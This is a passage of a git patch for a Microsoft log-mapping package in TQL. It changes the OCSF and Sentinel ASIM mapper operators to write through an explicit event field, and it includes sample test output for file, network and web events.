TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - }, - name: "asim.file_event", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:05Z, - EventEndTime: 2026-01-01T00:00:05Z, - EventProduct: "Endpoint", - EventVendor: "Microsoft", - EventOriginalUid: "file-2", - EventUid: "file-2", - EventOriginalType: "100105", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "host1", - DvcHostname: "host1", - DvcFQDN: "host1", - EventSchema: "FileEvent", - EventSchemaVersion: "0.2.2", - EventType: "FileRenamed", - ActorUsername: "alice", - ActorUserId: null, - TargetFilePath: "C:\\tmp\\invoice.pdf.exe", - TargetFileName: "invoice.pdf.exe", - SrcFilePath: "C:\\tmp\\payload.exe", - SrcFileName: "payload.exe", - SrcFilePathType: "Windows Local", - TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, - }, - name: "asim.file_event", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:01Z, - EventEndTime: 2026-01-01T00:00:01Z, - EventProduct: "Firewall", - EventVendor: "Microsoft", - EventOriginalUid: "net-1", - EventUid: "net-1", - EventOriginalType: "400106", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "fw1", - DvcHostname: "fw1", - DvcFQDN: "fw1", - EventSchema: "NetworkSession", - EventSchemaVersion: "0.2.7", - EventType: "Flow", - SrcIpAddr: 10.0.0.1, - SrcHostname: null, - SrcPortNumber: 12345, - DstIpAddr: 10.0.0.2, - DstHostname: null, - DstPortNumber: 443, - SrcBytes: 100, - DstBytes: 200, - AdditionalFields: { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, - }, - name: "asim.network_session", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:04Z, - EventEndTime: 2026-01-01T00:00:04Z, - EventProduct: "Proxy", - EventVendor: "Microsoft", - EventOriginalUid: "web-1", - EventUid: "web-1", - EventOriginalType: "400203", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "proxy1", - DvcHostname: "proxy1", - DvcFQDN: "proxy1", - EventSchema: "WebSession", - EventSchemaVersion: "0.2.7", - EventType: "HTTPsession", - Url: "https://example.org/index.html", - HttpRequestMethod: "GET", - EventResultDetails: "200", - AdditionalFields: { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, - }, - name: "asim.web_session", -} From 7233be9270627079fd7765e04951dc9843c54ff4 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:51:18 +0200 Subject: [PATCH 17/27] Target Microsoft mappers by field Require Microsoft map UDOs to write through an explicit event field. This makes OCSF and ASIM mapping composable with surrounding records and lets callers attach raw data outside the mapper without relying on deferred argument evaluation. Assisted-by: GPT-5 Codex (Superconductor) --- .../graph-defender-alerts-to-ocsf.tql | 4 +- .../graph-defender-incidents-to-ocsf.tql | 4 +- .../graph-directory-audits-to-ocsf.tql | 4 +- .../graph-intune-compliance-to-ocsf.tql | 4 +- .../graph-intune-detected-apps-to-ocsf.tql | 4 +- .../graph-intune-managed-devices-to-ocsf.tql | 4 +- .../graph-risk-detections-to-ocsf.tql | 4 +- .../examples/graph-risky-users-to-ocsf.tql | 4 +- microsoft/examples/graph-sign-ins-to-ocsf.tql | 4 +- .../examples/windows-event-log-to-ocsf.tql | 7 ++- microsoft/operators/asim/map.tql | 17 +++++-- .../operators/asim/ocsf/account_change.tql | 12 ++++- .../operators/asim/ocsf/authentication.tql | 12 ++++- .../operators/asim/ocsf/authorize_session.tql | 12 ++++- .../asim/ocsf/compliance_finding.tql | 12 ++++- .../operators/asim/ocsf/detection_finding.tql | 12 ++++- .../operators/asim/ocsf/dhcp_activity.tql | 12 ++++- .../operators/asim/ocsf/dns_activity.tql | 12 ++++- .../operators/asim/ocsf/entity_management.tql | 12 ++++- .../asim/ocsf/event_log_activity.tql | 12 ++++- .../asim/ocsf/file_system_activity.tql | 12 ++++- .../operators/asim/ocsf/group_management.tql | 12 ++++- .../operators/asim/ocsf/helpers/common.tql | 2 +- .../operators/asim/ocsf/http_activity.tql | 12 ++++- microsoft/operators/asim/ocsf/map.tql | 47 ++++++++++--------- .../operators/asim/ocsf/network_activity.tql | 12 ++++- .../operators/asim/ocsf/process_activity.tql | 12 ++++- .../asim/ocsf/scheduled_job_activity.tql | 12 ++++- .../asim/ocsf/windows_service_activity.tql | 12 ++++- microsoft/operators/graph/ocsf/map.tql | 11 ++++- microsoft/operators/ocsf/map.tql | 11 +++-- microsoft/operators/windows/ocsf/map.tql | 11 ++++- microsoft/tests/asim/graph.tql | 4 +- microsoft/tests/asim/ocsf.tql | 4 +- microsoft/tests/asim/ocsf/account_change.tql | 4 +- microsoft/tests/asim/ocsf/authentication.tql | 4 +- .../tests/asim/ocsf/detection_finding.tql | 4 +- microsoft/tests/asim/ocsf/dhcp_activity.tql | 4 +- microsoft/tests/asim/ocsf/dns_activity.tql | 4 +- .../tests/asim/ocsf/event_log_activity.tql | 4 +- .../tests/asim/ocsf/file_system_activity.tql | 4 +- .../tests/asim/ocsf/group_management.tql | 4 +- microsoft/tests/asim/ocsf/http_activity.tql | 4 +- microsoft/tests/asim/ocsf/map.tql | 3 +- .../tests/asim/ocsf/network_activity.tql | 4 +- .../tests/asim/ocsf/process_activity.tql | 4 +- microsoft/tests/asim/windows.tql | 4 +- ...pliance-policy-setting-state-summaries.tql | 4 +- .../tests/graph/ocsf/defender-alerts.tql | 4 +- .../tests/graph/ocsf/defender-incidents.tql | 4 +- microsoft/tests/graph/ocsf/detected-apps.tql | 4 +- .../tests/graph/ocsf/directory-audits.tql | 4 +- .../tests/graph/ocsf/managed-devices.tql | 4 +- .../tests/graph/ocsf/risk-detections.tql | 4 +- microsoft/tests/graph/ocsf/risky-users.tql | 4 +- microsoft/tests/graph/ocsf/sign-ins.tql | 4 +- microsoft/tests/ocsf/eid-0100.tql | 7 ++- microsoft/tests/ocsf/eid-0100.txt | 2 + microsoft/tests/ocsf/eid-0101.tql | 7 ++- microsoft/tests/ocsf/eid-0101.txt | 2 + microsoft/tests/ocsf/eid-0102.tql | 7 ++- microsoft/tests/ocsf/eid-0102.txt | 2 + microsoft/tests/ocsf/eid-0106.tql | 7 ++- microsoft/tests/ocsf/eid-0106.txt | 2 + microsoft/tests/ocsf/eid-0129.tql | 7 ++- microsoft/tests/ocsf/eid-0129.txt | 2 + microsoft/tests/ocsf/eid-0140.tql | 7 ++- microsoft/tests/ocsf/eid-0140.txt | 2 + microsoft/tests/ocsf/eid-0141.tql | 7 ++- microsoft/tests/ocsf/eid-0141.txt | 2 + microsoft/tests/ocsf/eid-0200.tql | 7 ++- microsoft/tests/ocsf/eid-0200.txt | 2 + microsoft/tests/ocsf/eid-0201.tql | 7 ++- microsoft/tests/ocsf/eid-0201.txt | 2 + microsoft/tests/ocsf/eid-1000.tql | 7 ++- microsoft/tests/ocsf/eid-1000.txt | 2 + microsoft/tests/ocsf/eid-1001.tql | 7 ++- microsoft/tests/ocsf/eid-1001.txt | 2 + microsoft/tests/ocsf/eid-1002.tql | 7 ++- microsoft/tests/ocsf/eid-1002.txt | 2 + microsoft/tests/ocsf/eid-1006.tql | 7 ++- microsoft/tests/ocsf/eid-1006.txt | 2 + microsoft/tests/ocsf/eid-1007.tql | 7 ++- microsoft/tests/ocsf/eid-1007.txt | 2 + microsoft/tests/ocsf/eid-1102.tql | 7 ++- microsoft/tests/ocsf/eid-1102.txt | 2 + microsoft/tests/ocsf/eid-1116.tql | 7 ++- microsoft/tests/ocsf/eid-1116.txt | 2 + microsoft/tests/ocsf/eid-1117.tql | 7 ++- microsoft/tests/ocsf/eid-1117.txt | 2 + microsoft/tests/ocsf/eid-1121.tql | 7 ++- microsoft/tests/ocsf/eid-1121.txt | 2 + microsoft/tests/ocsf/eid-2000.tql | 7 ++- microsoft/tests/ocsf/eid-2000.txt | 2 + microsoft/tests/ocsf/eid-4100.tql | 7 ++- microsoft/tests/ocsf/eid-4100.txt | 2 + microsoft/tests/ocsf/eid-4103.tql | 7 ++- microsoft/tests/ocsf/eid-4103.txt | 2 + microsoft/tests/ocsf/eid-4104.tql | 7 ++- microsoft/tests/ocsf/eid-4104.txt | 2 + microsoft/tests/ocsf/eid-4105.tql | 7 ++- microsoft/tests/ocsf/eid-4105.txt | 2 + microsoft/tests/ocsf/eid-4106.tql | 7 ++- microsoft/tests/ocsf/eid-4106.txt | 2 + microsoft/tests/ocsf/eid-4624.tql | 7 ++- microsoft/tests/ocsf/eid-4624.txt | 2 + microsoft/tests/ocsf/eid-4625.tql | 7 ++- microsoft/tests/ocsf/eid-4625.txt | 2 + microsoft/tests/ocsf/eid-4648.tql | 7 ++- microsoft/tests/ocsf/eid-4648.txt | 2 + microsoft/tests/ocsf/eid-4672.tql | 7 ++- microsoft/tests/ocsf/eid-4672.txt | 2 + microsoft/tests/ocsf/eid-4688.tql | 7 ++- microsoft/tests/ocsf/eid-4688.txt | 2 + microsoft/tests/ocsf/eid-4697.tql | 7 ++- microsoft/tests/ocsf/eid-4697.txt | 2 + microsoft/tests/ocsf/eid-4698.tql | 7 ++- microsoft/tests/ocsf/eid-4698.txt | 2 + microsoft/tests/ocsf/eid-4720.tql | 7 ++- microsoft/tests/ocsf/eid-4720.txt | 2 + microsoft/tests/ocsf/eid-4722.tql | 7 ++- microsoft/tests/ocsf/eid-4722.txt | 2 + microsoft/tests/ocsf/eid-4725.tql | 7 ++- microsoft/tests/ocsf/eid-4725.txt | 2 + microsoft/tests/ocsf/eid-4726.tql | 7 ++- microsoft/tests/ocsf/eid-4726.txt | 2 + microsoft/tests/ocsf/eid-4728.tql | 7 ++- microsoft/tests/ocsf/eid-4728.txt | 2 + microsoft/tests/ocsf/eid-4730.tql | 7 ++- microsoft/tests/ocsf/eid-4730.txt | 2 + microsoft/tests/ocsf/eid-4732.tql | 7 ++- microsoft/tests/ocsf/eid-4732.txt | 2 + microsoft/tests/ocsf/eid-4769.tql | 7 ++- microsoft/tests/ocsf/eid-4769.txt | 2 + microsoft/tests/ocsf/eid-4771.tql | 7 ++- microsoft/tests/ocsf/eid-4771.txt | 2 + microsoft/tests/ocsf/eid-4776.tql | 7 ++- microsoft/tests/ocsf/eid-4776.txt | 2 + microsoft/tests/ocsf/eid-5001.tql | 7 ++- microsoft/tests/ocsf/eid-5001.txt | 2 + microsoft/tests/ocsf/eid-5007.tql | 7 ++- microsoft/tests/ocsf/eid-5007.txt | 2 + microsoft/tests/ocsf/eid-6005.tql | 7 ++- microsoft/tests/ocsf/eid-6005.txt | 2 + microsoft/tests/ocsf/eid-6006.tql | 7 ++- microsoft/tests/ocsf/eid-6006.txt | 2 + microsoft/tests/ocsf/eid-7034.tql | 7 ++- microsoft/tests/ocsf/eid-7034.txt | 2 + microsoft/tests/ocsf/eid-7045.tql | 7 ++- microsoft/tests/ocsf/eid-7045.txt | 2 + microsoft/tests/ocsf/eid-9999.tql | 7 ++- microsoft/tests/ocsf/eid-9999.txt | 2 + 152 files changed, 666 insertions(+), 195 deletions(-) diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql index ae2bd8f..5432695 100644 --- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql +++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql @@ -8,6 +8,8 @@ microsoft::graph::defender::alerts \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql index 862f44c..f7d5ccd 100644 --- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql +++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql @@ -9,7 +9,9 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql index cf3498e..6cbec07 100644 --- a/microsoft/examples/graph-directory-audits-to-ocsf.tql +++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql @@ -9,7 +9,9 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql index de4b6b2..a5f4567 100644 --- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql +++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql index 3277563..20d3bc1 100644 --- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql +++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql index 4e0ef7f..b19b182 100644 --- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql +++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql @@ -7,6 +7,8 @@ microsoft::graph::intune::managed_devices \ tenant_id="TENANT_ID", client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql index 5b59ea1..191cac5 100644 --- a/microsoft/examples/graph-risk-detections-to-ocsf.tql +++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql index 1c37ffd..e0584d5 100644 --- a/microsoft/examples/graph-risky-users-to-ocsf.tql +++ b/microsoft/examples/graph-risky-users-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql index 7a1031a..96f5a04 100644 --- a/microsoft/examples/graph-sign-ins-to-ocsf.tql +++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql @@ -8,6 +8,8 @@ microsoft::graph::sign_ins \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/examples/windows-event-log-to-ocsf.tql b/microsoft/examples/windows-event-log-to-ocsf.tql index 7970b53..a25f54b 100644 --- a/microsoft/examples/windows-event-log-to-ocsf.tql +++ b/microsoft/examples/windows-event-log-to-ocsf.tql @@ -6,7 +6,10 @@ description: Parse Windows Event Log XML and map the structured event to OCSF. from_file "windows-event.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 9b4de4f..6a6e56c 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -1,11 +1,22 @@ --- description: Maps supported Microsoft events to Microsoft Sentinel ASIM. +args: + named: + - name: event + description: The field that holds the Microsoft event to map. + type: field --- -if class_uid? == null { - microsoft::ocsf::map +if $event.class_uid? == null { + microsoft::ocsf::map event=$event + _microsoft_outer = this + _microsoft_event = $event + this = _microsoft_event ocsf::derive ocsf::cast + _microsoft_outer._microsoft_event = this + this = _microsoft_outer + $event = move _microsoft_event } -microsoft::asim::ocsf::map +microsoft::asim::ocsf::map event=$event diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 0ac7957..5d3bda3 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserManagement events. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3001 +assert $event.class_uid == 3001 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -44,4 +51,5 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 599e62c..48e7b06 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Authentication events to Microsoft Sentinel ASIM Authentication events. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3002 +assert $event.class_uid == 3002 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -57,4 +64,5 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 7979689..1597761 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Authorize Session events to Microsoft Sentinel ASIM Authentication events. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3003 +assert $event.class_uid == 3003 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -54,4 +61,5 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 6e2ebd2..efc0a01 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM AlertEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 2003 +assert $event.class_uid == 2003 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -39,4 +46,5 @@ match ocsf.verdict? { _ => {} } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index fd6a6f2..510424b 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM AlertEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 2004 +assert $event.class_uid == 2004 + +ocsf = $event let $threat_categories = { adware: "Adware", @@ -54,4 +61,5 @@ match ocsf.verdict? { _ => {} } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 7b3e052..9973929 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4004 +assert $event.class_uid == 4004 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -19,4 +26,5 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.stri asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index dff6438..1f0b6e9 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4003 +assert $event.class_uid == 4003 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -24,4 +31,5 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4596c6a..de663a9 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3004 +assert $event.class_uid == 3004 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index a18038f..eda9813 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1008 +assert $event.class_uid == 1008 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 8ce30a7..37cf962 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM FileEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1001 +assert $event.class_uid == 1001 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -34,4 +41,5 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { } asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 78da3a0..2437da8 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserManagement events. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3006 +assert $event.class_uid == 3006 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -40,4 +47,5 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql index 01cb285..bc61f84 100644 --- a/microsoft/operators/asim/ocsf/helpers/common.tql +++ b/microsoft/operators/asim/ocsf/helpers/common.tql @@ -2,7 +2,7 @@ description: Initializes shared ASIM fields from a validated OCSF event. --- -this = {ocsf: this, asim: {}} +asim = {} asim.EventCount = 1 asim.EventStartTime = ocsf.start_time? else ocsf.time diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 9c06324..92f6e13 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSession records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4002 +assert $event.class_uid == 4002 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -17,4 +24,5 @@ if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index f9025c4..2fda544 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -1,63 +1,68 @@ --- description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -match class_uid { +match $event.class_uid { 2003 => { - microsoft::asim::ocsf::compliance_finding + microsoft::asim::ocsf::compliance_finding event=$event } 2004 => { - microsoft::asim::ocsf::detection_finding + microsoft::asim::ocsf::detection_finding event=$event } 1006 => { - microsoft::asim::ocsf::scheduled_job_activity + microsoft::asim::ocsf::scheduled_job_activity event=$event } 1008 => { - microsoft::asim::ocsf::event_log_activity + microsoft::asim::ocsf::event_log_activity event=$event } 3004 => { - microsoft::asim::ocsf::entity_management + 